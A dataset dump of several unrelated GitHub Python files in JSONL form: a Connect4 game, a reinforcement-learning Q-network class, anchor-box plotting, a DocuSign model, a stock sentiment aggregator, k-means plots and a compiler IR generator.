\"/home/lsmjn/Drone-Deconv/trained_model/Drone_Deconv.ckpt\")\n print('Model saved in file: %s' % save_path)\n train_writer.close()\n\nif __name__ == '__main__':\n x_batch_train, y_batch_train = input_pipeline(TRAINING_DATASET, BATCH_SIZE, NUM_EPOCHS)\n x_batch_validation, y_batch_validation = input_pipeline(VALIDATION_DATASET, BATCH_SIZE, NUM_EPOCHS)\n d = model.Deconv(x_batch_train, y_batch_train, x_batch_validation, y_batch_validation, num_of_class=3)\n train(d, BATCH_SIZE, NUM_EPOCHS)","repo_name":"flyhamsw/Drone-Deconv","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"1766816906","text":"#makes a board with two dimensions of rows and columns \r\ndef create_game_grid(rows, cols):\r\n\r\n\tgrid = []\r\n\tfor _ in range(rows):\r\n\t\tgrid.append(['*'] * cols)\r\n\treturn grid\r\n\r\n\r\n#gets pieces to reurn in the boardwith the chosen column or row, and if out of range will give '*'\r\ndef get_piece(grid, row, col):\r\n\r\n\trows = len(grid)\r\n\tcols = len(grid[0])\r\n\t\r\n\t# check the range\r\n\tif row < 0 or row >= rows:\r\n\t\treturn '*'\r\n\tif col < 0 or col >= cols:\r\n\t\treturn '*'\r\n\treturn grid[row][col]\r\n\r\n#accounts for getting four in a row, connected string\r\ndef get_direction_line(grid, row, col, deltaX, deltaY):\r\n\r\n\tline = []\r\n\tfor _ in range(4):\r\n\t\trow += deltaX\r\n\t\tcol += deltaY\r\n\t\tline.append(get_piece(grid, row, col))\r\n\treturn ''.join(line)\r\n\r\n\r\n\r\n\r\n\r\n#checks to see of 4 x's or o's are connected to get a win\r\ndef has_winner(grid, row, col):\r\n\r\n\tdirections = [\r\n\t\t\t\t (0, 1), # right\r\n\t\t\t\t (1, 1), # right up\r\n\t\t\t\t (1, 0), # up\r\n\t\t\t\t (1, -1), # left up\r\n\t\t\t\t (0, -1), # left\r\n\t\t\t\t (-1, -1),# left down\r\n\t\t\t\t (-1, 0), # down\r\n\t\t\t\t (-1, 1), # right down\r\n\t\t\t\t]\r\n\t\r\n\t# check each direction\r\n\tfor direction in directions:\r\n\t\tdeltaX = direction[0]\r\n\t\tdeltaY = direction[1]\r\n\t\tline = get_direction_line(grid, row, col, deltaX, deltaY)\r\n\t\t\r\n\t\t# find a winner\r\n\t\twinner = get_line_winner(line)\r\n\t\tif winner != None:\r\n\t\t\treturn winner\r\n\t\t\r\n\treturn None\r\n\r\n\r\n\r\n#checks to see if there is a winner\t\r\ndef get_winner(grid):\r\n\r\n\trows = len(grid)\r\n\tcols = len(grid[0])\r\n\t\r\n\t# check each piece\r\n\tfor row in range(rows):\r\n\t\tfor col in range(cols):\r\n\t\t\t\r\n\t\t\t# find a winner\r\n\t\t\twinner = has_winner(grid, row, col)\r\n\t\t\tif winner != None:\r\n\t\t\t\treturn winner\r\n\t\r\n\treturn None\r\n\r\n\r\n#checks for all directions and sees if there is already four connected\r\ndef get_line_winner(line):\r\n\r\n\tif line.find('XXXX') != -1:\r\n\t\treturn 'X'\r\n\telif line.find('OOOO') != -1:\r\n\t\treturn 'O'\r\n\telse:\r\n\t\treturn None\r\n\r\n#checks to see if the board is full\t\r\ndef is_full_grid(grid):\r\n\r\n\tcols = len(grid[0])\r\n\tfor col in range(0, cols):\r\n\t\tif not is_full_column(grid, col):\r\n\t\t\treturn False\r\n\treturn True\r\n#checks to see if game os over, winner\r\ndef is_game_over(grid):\r\n\r\n\twinner = get_winner(grid)\r\n\tif winner != None:\r\n\t\treturn True\r\n\r\n\treturn is_full_grid(grid)\r\n#displays the board\r\ndef print_game_board(grid):\r\n\r\n\trows = len(grid)\r\n\tcols = len(grid[0])\r\n\r\n\tfor row in range(rows - 1, -1, -1):\r\n\t\tprint(row, end = \"\")\r\n\t\tprint(' ', end = \"\")\r\n\t\tfor col in range(cols):\r\n\t\t\tprint('%s ' % grid[row][col], end = \"\")\r\n\t\tprint()\r\n\r\n\tprint(' ', end = \"\")\r\n\tfor col in range(cols):\r\n\t\tprint('%d ' % (col), end = \"\")\r\n\r\n\tprint()\r\n\r\n#checks to see if piece is empty\r\ndef is_empty_piece(grid, row, col):\r\n\r\n\treturn grid[row][col] == '*'\r\n\r\n\r\n\r\n#finds a row that works so it canmove\r\ndef find_the_top_row(grid, col):\r\n\r\n\trows = len(grid)\r\n\tfor row in range(0, rows):\r\n\t\t# the piece is empty, it is can be moved\r\n\t\tif is_empty_piece(grid, row, col):\r\n\t\t\tbreak\r\n\telse:\r\n\t\t# not found\r\n\t\trow = -1\r\n\r\n\treturn row\r\n\r\n\r\n\r\n\r\n#checks if column is full\r\ndef is_full_column(grid, col):\r\n\r\n\treturn find_the_top_row(grid, col) == -1\r\n\r\n\r\n#moves the piece where it was asked to\r\ndef grid_move(grid, col, curr_player):\r\n\r\n\trow = find_the_top_row(grid, col)\r\n\tif row == -1:\r\n\t\treturn\r\n\tgrid[row][col] = curr_player\r\n\r\n#asks user for the move\t\r\ndef select_move_column(curr_player, grid):\r\n\r\n\tcols = len(grid[0])\r\n\twhile True:\r\n\t\ttry:\r\n\t\t\tcol = input('%s please enter a move: ' % curr_player)\r\n\t\t\tcol = int(col)\r\n\t\t\tif col >= 0 and col < cols and not is_full_column(grid, col):\r\n\t\t\t\treturn col\r\n\t\texcept:\r\n\t\t\tpass\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\t# create game grid\r\n\trows = 6\r\n\tcols = 7\r\n\tgrid = create_game_grid(rows, cols)\r\n\r\n\tplayer1 = 'X'\r\n\tplayer2 = 'O'\r\n\r\n\tcurr_player = player1\r\n\r\n\tprint()\r\n\twhile not is_game_over(grid):\r\n\t\t\r\n\t\t# print game board\r\n\t\tprint_game_board(grid)\r\n\t\tprint()\r\n\r\n\t\t# user to enter the column to be moved\r\n\t\tcol = select_move_column(curr_player, grid)\r\n\t\t\r\n\t\t# make move\r\n\t\tgrid_move(grid, col, curr_player)\r\n\r\n\t\t# take turn player\r\n\t\tcurr_player = player2 if curr_player == player1 else player1\r\n\r\n\t# game is over, print game board\r\n\tprint_game_board(grid)\r\n\tprint()\r\n\t\r\n\t# check winner\r\n\twinner = get_winner(grid)\r\n\tif winner != None:\r\n\t\tprint('%s won the game.' % winner)\r\n\telse:\r\n\t\tprint('The game ended in a tie.')\r\n","repo_name":"itzelnat/Connect4","sub_path":"connect4.py","file_name":"connect4.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28735253274","text":"#Core Imports Here\nfrom Configs import GAME_CLASS\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Flatten, Input\nfrom keras.initializers import Zeros\nimport numpy as np\nfrom Configs import ACTION_CLASS\n##############################################################################################\nclass DeepQNetwork(object):\n \"\"\"\n Implements Replay Memory Learning in Neural Network\n \"\"\"\n def __init__(self, update_every=1000):\n \"\"\"\n NEEDS\n save\n load\n predict from state vector\n train from input minibatch of format [state, action, reward, new_state, done]\n\n \"\"\"\n self.g = GAME_CLASS()\n self.update_counter = 0\n self.update_every = 1000\n self.main_model = self.create_model()\n self.prev_model = self.create_model()\n self.prev_model.set_weights(self.main_model.get_weights())\n\n def update_prev_model(self):\n self.prev_model.set_weights(self.main_model.get_weights())\n self.update_counter = 0\n\n def update_prev_model_checks(self):\n \"\"\"\n Checks if we should update prev model\n \"\"\"\n return self.update_counter >= self.update_every\n\n def train(self, minibatch, discount):\n \"\"\"\n For every data point in the minibatch does the following:\n estimate the value of each action of the current_state using the prev_model\n estimate the value of each action of next_state using prev_model and get the max of that\n For the action that was taken set the target q value to be return + discount * max(q_values of next state) rest is as predicted\n use the target as Y and states as X\n then fit to the main model\n Check to see if prev model needs to be updated\n \"\"\"\n X = []\n y = []\n for i, (state, action, reward, next_state, done) in enumerate(minibatch):\n X.append(self.prepare_X(state=state, action=action))\n y.append(self.prepare_y(state=state, reward=reward, next_state=next_state, discount=discount, done=done))\n X = np.array(X, dtype=np.int8)\n y = np.array(y)\n\n \n self.main_model.fit(X, y, batch_size = len(minibatch), verbose=0)\n self.update_counter+=1\n if self.update_prev_model_checks():\n self.update_prev_model()\n\n def predict(self, states, **kwargs):\n \"\"\"\n Returns the predictions as per the main model\n states is just the list of state representations\n actions provided is a list of actions with same size as states\n \"\"\"\n actions = kwargs['actions']\n X = []\n for i, state in enumerate(states):\n X.append(self.transform_input(state , action=actions[i]))\n X = np.array(X)\n return self.main_model.predict(X)\n\n def save(self, final_path):\n self.main_model.save(final_path)\n\n def load(self, final_path):\n \"\"\"\n Loads model into main model and updates prev\n \"\"\"\n self.main_model = load_model(final_path)\n self.update_prev_model()\n return\n \n def prepare_X(self, **kwargs):\n \"\"\"\n Use state action pair\n \"\"\"\n state = kwargs['state']\n action = kwargs['action']\n return self.transform_input(state, action=action)\n\n def prepare_y(self, **kwargs):\n state = kwargs['state']\n next_state = kwargs['next_state']\n discount = kwargs['discount']\n reward = kwargs['reward']\n done = kwargs['done']\n if not done:\n next_values = []\n for act in ACTION_CLASS.get_action_space():\n inp = np.array([self.transform_input(state=next_state, action=act)])\n #print(inp.shape)\n pred = self.prev_model.predict(inp)\n next_values.append(pred[0])\n return reward + discount * max(next_values)\n else:\n return reward\n\n\n def create_model(self):\n raise NotImplementedError\n\n def transform_input(self, state, **kwargs):\n raise NotImplementedError\n\n def additional_q_target_processes(self, state, q_target):\n raise NotImplementedError\n\n\n# Implement Your Custom Classes Below\n##############################################################################################\n","repo_name":"Sumo-99/Reinforcement-Learning-Toolkit","sub_path":"Agents/Models/NeuralNetworks.py","file_name":"NeuralNetworks.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16448769738","text":"\"\"\"\r\n画出指定坐标的所有锚框\r\nhttps://blog.csdn.net/weixin_44604887/article/details/113046955\r\n\"\"\"\r\n\r\nimport numpy as np # 可能用到的数据值计算库\r\nimport os # 可能用到的文件操作\r\nimport matplotlib.pyplot as plt \t\t# 图形绘制\r\nimport matplotlib.patches as patches \t# 添加矩形框\r\nimport matplotlib.image as image \t\t# 读取图像数据\r\nimport torch\r\nimport torchvision\r\nimport cv2\r\nfrom myFunctions.anchor_box import multibox_prior\r\n\r\n\r\ndef draw_rectangle(bbox=[], mode=True, color='k', fill=False):\r\n '''绘制矩形框\r\n bbox:边界框数据(默认框数据不超过图片边界)\r\n mode: 边界框数据表示的模式\r\n True: to (x1,y1,x2,y2)\r\n False: to (x,y,w,h)\r\n color: 边框颜色\r\n fill: 是否填充\r\n '''\r\n if mode is True: # to (x1,y1,x2,y2)\r\n x = bbox[0]\r\n y = bbox[1]\r\n w = bbox[2] - bbox[0] + 1 # 考虑到实际长度由像素个数决定,因此加1(可按坐标轴上两点间的点数推导)\r\n h = bbox[3] - bbox[1] + 1\r\n else: # to (x,y,w,h)\r\n # 默认绘制的框不超出边界\r\n x = bbox[0] - bbox[2] / 2.0\r\n y = bbox[1] - bbox[3] / 2.0\r\n w = bbox[2]\r\n h = bbox[3]\r\n\r\n # 绘制边界框\r\n # patches.Rectangle需要传入左上角坐标、矩形区域的宽度、高度等参数\r\n # 获取绘制好的图形的返回句柄——用于添加到当前的图像窗口中\r\n rect = patches.Rectangle((x, y), w, h,\r\n linewidth=1, # 线条宽度\r\n edgecolor=color, # 线条颜色\r\n facecolor='y', #\r\n fill=fill, linestyle='-')\r\n\r\n return rect\r\n\r\n\r\ndef draw_anchor(ax, boxes, img_height, img_width, color='r'):\r\n '''绘制锚框————同一中心点三个不同大小的锚框\r\n ax: plt的窗体句柄——用于调用矩形绘制\r\n center:中心点坐标\r\n length:基本长度\r\n scales:尺寸\r\n ratios:长宽比\r\n img_height: 图片高\r\n img_width: 图片宽\r\n\r\n 一个锚框的大小,由基本长度+尺寸+长宽比有关\r\n 同时锚框的最终计算值与图片实际大小有关——不能超过图片实际范围嘛\r\n '''\r\n\r\n bboxs = [] # 这里的边界框bbox是指的锚框\r\n\r\n # for scale in scales: # 遍历尺寸情况\r\n # for ratio in ratios: # 同一尺寸下遍历不同的长宽比情况\r\n # # 利用基本长度、尺寸与长宽比进行锚框长宽的转换\r\n # # h = length * scale * np.math.sqrt(ratio)\r\n # # w = length * scale / np.math.sqrt(ratio)\r\n # # 利用求得的长宽,确定绘制矩形需要的左上角顶点坐标和右下角顶点坐标\r\n # # 不同的绘制API可能有不同的参数需要,相应转换即可\r\n # x1 = max(center[0] - w / 2., 0.) # 考虑边界问题\r\n # y1 = max(center[1] - h / 2., 0.)\r\n # x2 = min(center[0] + w / 2. - 1.0, img_width - 1.) # center[0] + w / 2 -1.0 是考虑到边框不超过边界\r\n # y2 = min(center[1] + h / 2. - 1.0, img_height - 1.)\r\n #\r\n # bbox = [x1, y1, x2, y2]\r\n # print('An Anchor: ', bbox)\r\n # bboxs.append(bbox) # 押入生成的anchor\r\n\r\n for box in boxes:\r\n x1, y1, x2, y2 = box\r\n x1 = max(x1, 0.) # 考虑边界问题\r\n y1 = max(y1, 0.)\r\n x2 = min(x2, img_width - 1.) # center[0] + w / 2 -1.0 是考虑到边框不超过边界\r\n y2 = min(y2, img_height - 1.)\r\n bbox = [x1, y1, x2, y2]\r\n\r\n # 绘制anchor的矩形框\r\n rect = draw_rectangle(bbox, mode=True, color=color)\r\n ax.add_patch(rect)\r\n\r\n\r\n# 先读取图像,再绘制\r\n# fig = plt.figure(figsize=(12, 8))\r\nplt.figure(1)\r\nax = plt.gca()\r\n\r\n# 图片路径\r\nimg = cv2.imread(\"dataset/anchor/catdog.jpg\")\r\nh, w = img.shape[:2]\r\n\r\nb, g, r = cv2.split(img)\r\nimg = cv2.merge([r, g, b])\r\n\r\nX = torch.rand(size=(1, 3, h, w))\r\nbboxes = multibox_prior(X, sizes=[0.75, 0.5, 0.25], ratios=[1, 2, 0.5])\r\nbboxes = bboxes.reshape(h, w, 5, 4)\r\ncenter = [620, 710]\r\nbbox_scale = torch.tensor((w, h, w, h))\r\nboxes = np.array(bboxes[center[0], center[1], :, :] * bbox_scale)\r\n\r\n# img_path = os.path.join(os.getcwd(), 'img', '1.jpg')\r\n# img = image.imread(img_path) # 读取图片数据\r\nplt.imshow(img) # 展示图片\r\nprint(img.shape[0])\r\nprint(img.shape[1])\r\n\r\ndraw_anchor(ax=ax, boxes=boxes,\r\n\t\t\timg_height=h, img_width=w,\r\n\t\t\tcolor='r')\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Ljy0109/learn_pytorch","sub_path":"practice/15 draw_anchor_box.py","file_name":"15 draw_anchor_box.py","file_ext":"py","file_size_in_byte":4645,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70471570013","text":"from tools import crypto\n\n\ndef junk(string):\n result = []\n last_is_string = False\n i = 0\n while i < len(string):\n if crypto.isnum(string[i]) or (string[i] == '-'\n and (i == 0 or string[i-1] == '(')):\n buffer = string[i]\n while i+1 < len(string) and crypto.isnum(buffer + string[i+1]):\n i += 1\n buffer += string[i]\n result.append(buffer)\n last_is_string = False\n else:\n if last_is_string:\n result[len(result)-1] += string[i]\n else:\n result.append(string[i])\n last_is_string = True\n i += 1\n return result\n","repo_name":"bugsbringer/Calculator-KivyMD","sub_path":"tools/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74637004891","text":"# coding: utf-8\n\n\"\"\"\n DocuSign REST API\n\n The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign.\n\n OpenAPI spec version: v2.1\n Contact: devcenter@docusign.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom pprint import pformat\nfrom six import iteritems\nimport re\n\n\nclass PolyLine(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n def __init__(self, x1=None, x2=None, y1=None, y2=None):\n \"\"\"\n PolyLine - a model defined in Swagger\n\n :param dict swaggerTypes: The key is attribute name\n and the value is attribute type.\n :param dict attributeMap: The key is attribute name\n and the value is json key in definition.\n \"\"\"\n self.swagger_types = {\n 'x1': 'str',\n 'x2': 'str',\n 'y1': 'str',\n 'y2': 'str'\n }\n\n self.attribute_map = {\n 'x1': 'x1',\n 'x2': 'x2',\n 'y1': 'y1',\n 'y2': 'y2'\n }\n\n self._x1 = x1\n self._x2 = x2\n self._y1 = y1\n self._y2 = y2\n\n @property\n def x1(self):\n \"\"\"\n Gets the x1 of this PolyLine.\n \n\n :return: The x1 of this PolyLine.\n :rtype: str\n \"\"\"\n return self._x1\n\n @x1.setter\n def x1(self, x1):\n \"\"\"\n Sets the x1 of this PolyLine.\n \n\n :param x1: The x1 of this PolyLine.\n :type: str\n \"\"\"\n\n self._x1 = x1\n\n @property\n def x2(self):\n \"\"\"\n Gets the x2 of this PolyLine.\n \n\n :return: The x2 of this PolyLine.\n :rtype: str\n \"\"\"\n return self._x2\n\n @x2.setter\n def x2(self, x2):\n \"\"\"\n Sets the x2 of this PolyLine.\n \n\n :param x2: The x2 of this PolyLine.\n :type: str\n \"\"\"\n\n self._x2 = x2\n\n @property\n def y1(self):\n \"\"\"\n Gets the y1 of this PolyLine.\n \n\n :return: The y1 of this PolyLine.\n :rtype: str\n \"\"\"\n return self._y1\n\n @y1.setter\n def y1(self, y1):\n \"\"\"\n Sets the y1 of this PolyLine.\n \n\n :param y1: The y1 of this PolyLine.\n :type: str\n \"\"\"\n\n self._y1 = y1\n\n @property\n def y2(self):\n \"\"\"\n Gets the y2 of this PolyLine.\n \n\n :return: The y2 of this PolyLine.\n :rtype: str\n \"\"\"\n return self._y2\n\n @y2.setter\n def y2(self, y2):\n \"\"\"\n Sets the y2 of this PolyLine.\n \n\n :param y2: The y2 of this PolyLine.\n :type: str\n \"\"\"\n\n self._y2 = y2\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == other\n","repo_name":"deligence-vinit/deligence-django-docusign-connect","sub_path":"docusign_connect/build/lib/app/docusign/models/poly_line.py","file_name":"poly_line.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"72345737050","text":"import random\nfrom flask_app.python_scripts.user_input_analysis import is_angry\n\ndef getResponse(ints, intents_json, msg, nlp, sentiment_analyser, tokenizer, max_len, status):\n tag = ints[0][\"intent\"]\n if tag== 'noanswer':\n return no_answer(msg, nlp, sentiment_analyser, tokenizer, max_len, status) \n list_of_intents = intents_json[\"intents\"]\n for i in list_of_intents:\n if i[\"tag\"] == tag:\n return random.choice(i[\"responses\"])\n\n\ndef no_answer(msg, nlp, sentiment_analyser, tokenizer, max_len, status):\n angry = is_angry(msg, nlp, sentiment_analyser, tokenizer, max_len)\n if angry:\n status[2] = True\n return 'Would you like to talk to one of our collaborator to get more information?'\n else:\n return fill_booking(status)\n\n\ndef fill_booking(status):\n if not status['booking']['day']:\n status['info_required'] = 'day'\n return 'Which day would you like to book a table?'\n elif not status['booking']['time']:\n status['info_required'] = 'day'\n return 'At which time would you like to come?'\n else:\n status['info_required'] = 'people'\n return 'How many people will be there?'\n\n\n\n\ndef extract_info(sentence, nlp):\n sent = nlp(sentence)\n \n ","repo_name":"spolovynko/Chatbot-Resa","sub_path":"flask_app/python_scripts/bot_answer.py","file_name":"bot_answer.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18360280963","text":"import finnhub\nimport datetime\nimport json\nimport time\n\nconfig = json.load(open('config.json', mode='r'))\nfinnhub_client = finnhub.Client(api_key=config['finnhub_api_key'])\n\ncalls = 0\n\n\ndef to_datetime(str_date):\n date_split = str_date.split('-')\n return datetime.date(int(date_split[0]), int(date_split[1]), int(date_split[2]))\n\n\ndef is_holiday(datetime):\n return datetime.month == 1 and datetime.day == 1 \\\n or datetime.month == 1 and datetime.day == 18 \\\n or datetime.month == 2 and datetime.day == 15 \\\n or datetime.year == 2021 and datetime.month == 1 and datetime.day == 18 \\\n or datetime.month == 5 and datetime.day == 31 \\\n or datetime.month == 7 and datetime.day == 5 \\\n or datetime.month == 9 and datetime.day == 6 \\\n or datetime.month == 11 and datetime.day == 25 \\\n or datetime.month == 12 and datetime.day == 24\n\n\ndef is_weekend(dt):\n return dt.weekday() > 4 or is_holiday(dt)\n\n\ndef minus_with_weekends(dt):\n next = dt - datetime.timedelta(days=1)\n while is_weekend(next):\n next = next - datetime.timedelta(days=1)\n return next\n\n\ndef make_sentiment_file(reddit):\n global calls\n\n output_file = open('reddit_sentiment.json' if reddit else 'twitter_sentiment.json', mode='w+')\n output = {}\n for line in open('data/s&p500_stock_names.txt', mode='r').read().splitlines():\n split = line.split(',')\n ticker = split[0]\n print('trying ' + ticker)\n data = {}\n\n to_date = datetime.date(2021, 11, 14)\n visited_dates = set()\n while len(visited_dates) < 100:\n print(data)\n try:\n overall_sentiment = finnhub_client.stock_social_sentiment(ticker, _from='2017-01-01',\n to=to_date.strftime('%Y-%m-%d'))\n sentiment = []\n if reddit:\n sentiment = overall_sentiment['reddit']\n else:\n sentiment = overall_sentiment['twitter']\n last_date_datetime = None\n for datum in sentiment:\n score = datum['score']\n date = datum['atTime'].split(' ')[0]\n\n if date in data:\n data[date].append(score)\n else:\n data[date] = [score]\n\n if date not in visited_dates and not is_weekend(to_datetime(date)):\n visited_dates.add(date)\n\n last_date_datetime = to_datetime(date)\n\n if last_date_datetime is None:\n data[to_date.strftime('%Y-%m-%d')] = [0] * 100\n to_date = to_date - datetime.timedelta(days=1)\n break\n else:\n to_date = last_date_datetime - datetime.timedelta(days=1)\n except finnhub.FinnhubAPIException:\n print('API limit reached, resting for a minute...')\n time.sleep(60.1)\n\n previous_date = None\n weekend_accumulation = []\n for date, values in data.items():\n if to_datetime(date).weekday() > 4:\n weekend_accumulation.append(sum(values) / len(values))\n elif previous_date is not None and to_datetime(date) != minus_with_weekends(previous_date):\n output[ticker].insert(0, sum(output[ticker]) / len(output[ticker]))\n print('average for ' + date + ' in ticker ' + ticker + ' is ' + str(output[ticker][0]))\n else:\n value = sum(values) / len(values)\n if to_datetime(date).weekday() == 4:\n value = (value + sum(weekend_accumulation)) / (len(weekend_accumulation) + 1)\n weekend_accumulation = []\n if ticker not in output:\n output[ticker] = []\n output[ticker].insert(0, value)\n previous_date = to_datetime(date)\n print('average for ' + date + ' in ticker ' + ticker + ' is ' + str(output[ticker][0]))\n\n json.dump(output, output_file)\n print('finished')\n print('len=' + str(len(output['AAPL'])))\n\n\nmake_sentiment_file(True)\nmake_sentiment_file(False)\n","repo_name":"Arham4/buy-the-dip","sub_path":"server/social_sentiment_aggregator.py","file_name":"social_sentiment_aggregator.py","file_ext":"py","file_size_in_byte":4295,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"5920171606","text":"# p-k-means Project\n# by Mohammad Mahmoodi Varnamkhasti\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndf = pd.read_csv(\"result1_simple_kmeans.csv\")\n# line 1 for simple kmeans\nx1 = df[\"Clusters\"].to_numpy()\ny1 = df[\"Iterations\"].to_numpy()\n# plotting the line 1 points\nplt.plot(x1, y1, label = \"simple kmeans\")\n\n# df = pd.read_csv(\"result1_modified_sam_nei.csv\")\n# # line 2 for kmeans with sampling neighborhood\n# x2 = df[\"Clusters\"].to_numpy()\n# y2 = df[\"Iterations\"].to_numpy()\n# # plotting the line 2 points\n# plt.plot(x2, y2, label = \"sampling neighborhood\")\n\ndf = pd.read_csv(\"result1_plus_plus.csv\")\n# line 3 for kmeans++\nx3 = df[\"Clusters\"].to_numpy()\ny3 = df[\"Iterations\"].to_numpy()\n# plotting the line 2 points\nplt.plot(x3, y3, label = \"kmeans++\")\n\n\n# df = pd.read_csv(\"random_mean10.csv\")\n# # line 7 for random mean 10\n# x7 = df[\"Clusters\"].to_numpy()\n# y7 = df[\"Iterations\"].to_numpy()\n# # plotting the line 2 points\n# plt.plot(x7, y7, label = \"random mean 10\")\n\n# df = pd.read_csv(\"random_mean25.csv\")\n# # line 4 for random mean 25\n# x4 = df[\"Clusters\"].to_numpy()\n# y4 = df[\"Iterations\"].to_numpy()\n# # plotting the line 2 points\n# plt.plot(x4, y4, label = \"random mean 25\")\n\n\n# df = pd.read_csv(\"random_mean50.csv\")\n# # line 5 for random mean 50\n# x5 = df[\"Clusters\"].to_numpy()\n# y5 = df[\"Iterations\"].to_numpy()\n# # plotting the line 2 points\n# plt.plot(x5, y5, label = \"random mean 50\")\n\n\n\n# df = pd.read_csv(\"random_mean75.csv\")\n# # line 5 for random mean 75\n# x6 = df[\"Clusters\"].to_numpy()\n# y6 = df[\"Iterations\"].to_numpy()\n# # plotting the line 2 points\n# plt.plot(x6, y6, label = \"random mean 75\")\n\ndf = pd.read_csv(\"random_mean_auto.csv\")\n# line 9 for random mean Auto\nx9 = df[\"Clusters\"].to_numpy()\ny9 = df[\"Iterations\"].to_numpy()\n# plotting the line 2 points\nplt.plot(x9, y9, label = \"random mean Auto\")\n\n\n# df = pd.read_csv(\"random_mean_auto_m2.csv\")\n# # line 10 for random mean Auto 2\n# x10 = df[\"Clusters\"].to_numpy()\n# y10 = df[\"Iterations\"].to_numpy()\n# # plotting the line 2 points\n# plt.plot(x10, y10, label = \"random mean Auto *2\")\n\nplt.xlabel('Clusters')\n# Set the y axis label of the current axis.\nplt.ylabel('Iterations')\n# Set a title of the current axes.\nplt.title('Comparing Iterations ')\n# show a legend on the plot\nplt.legend()\n# Display a figure.\nplt.show()","repo_name":"MohammadDevelop/p-k-means","sub_path":"visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69946962973","text":"from compiler.codegen.type import irtype\nfrom llvmlite import ir\n\n\ndef irgen_string(string, builder, table):\n \"\"\"\n Return a string, creating it if does not exist yet. \n \"\"\"\n if not string.value in table.strings:\n string_type = irtype(string.type.base, dims=string.type.dims) \n addr = ir.GlobalVariable(builder.module, string_type, table.gtable.new_name())\n\n addr.global_constant = True \n addr.unnamed_addr = True\n\n encoded = bytearray(string.value.encode(\"ascii\"))\n addr.initializer = ir.Constant(string_type, encoded)\n table.strings[string.value] = addr\n\n\n addr = table.strings[string.value]\n return builder.bitcast(addr, irtype(\"byte\", pdepth=1))\n\n\n\ndef irgen_expr(expr, builder, table):\n \"\"\"\n Generate a code sequence producing a Dana expression\n \"\"\"\n operator = expr.operator\n special = dict({\"const\" : irgen_const,\n \"call\" : irgen_func,\n \"lvalue\" : irgen_rvalue,\n \"string\" : irgen_string,\n \"id\" : irgen_id,\n })\n\n\n if operator in special.keys():\n return special[operator](expr, builder, table)\n\n\n if len(expr.children) == 1:\n operand = irgen_expr(expr.children[0], builder, table)\n return irgen_unary(builder, operator, operand)\n\n else:\n first = irgen_expr(expr.children[0], builder, table)\n second = irgen_expr(expr.children[1], builder, table)\n return irgen_binary(builder, operator, first, second)\n\n\ndef irgen_const(expr, builder, table):\n \"\"\"\n Generate a code sequence producing a Dana constant \n \"\"\"\n return ir.Constant(irtype(expr.type.base), int(expr.value)) \n\n\ndef irgen_func(expr, builder, table):\n \"\"\"\n Generate a code sequence producing a Dana func \n \"\"\"\n args = [irgen_expr(arg, builder, table) for arg in expr.children] \n return irgen_call(builder, expr.value, args, table)\n\n\ndef irgen_rvalue(expr, builder, table):\n \"\"\"\n Generate a code sequence producing a Dana rvalue from an lvalue \n \"\"\"\n addr = irgen_lvalue(expr, builder, table)\n return builder.load(addr)\n\n\ndef irgen_id(expr, builder, table):\n \"\"\"\n Generate a code sequence producing a Dana id operation \n \"\"\"\n return irgen_expr(expr.children[0], builder, table)\n\n\n\n\ndef irgen_unary(builder, operator, operand):\n \"\"\"\n Generate a code sequence producing the result of a \n unary operation\n \"\"\"\n operations = dict({\"neg\": irgen_neg,\n \"!\": irgen_bang,\n \"not\": irgen_not,})\n return operations[operator](builder, operand)\n\n\ndef irgen_neg(builder, operand):\n \"\"\"\n Generate a code sequence producing the result of an \n arithmetic negation\n \"\"\"\n return builder.neg(operand)\n\ndef irgen_bang(builder, operand):\n \"\"\"\n Generate a code sequence producing the result of a \n logical negation \n \"\"\"\n return builder.not_(operand) \n\ndef irgen_not(builder, operand):\n \"\"\"\n Generate a code sequence producing the result of a \n negation of a \"truthy\" or \"falsey\" value\n \"\"\"\n 